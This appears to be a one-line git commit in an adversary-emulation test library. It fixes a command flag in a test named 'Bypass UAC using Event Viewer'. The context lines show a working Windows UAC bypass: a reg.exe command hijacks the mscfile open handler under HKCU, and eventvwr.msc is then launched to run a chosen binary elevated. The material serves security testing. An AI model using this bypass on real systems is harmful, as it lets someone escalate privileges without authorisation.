Update flag for cmd.exe (#416)

This commit is contained in:
Ross Wolf
2019-01-16 12:25:04 -05:00
committed by Zac Brown
parent c65ed5d77e
commit 6b6f4beae5
+1 -1
View File
@@ -20,7 +20,7 @@ atomic_tests:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
cmd.exe /c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: |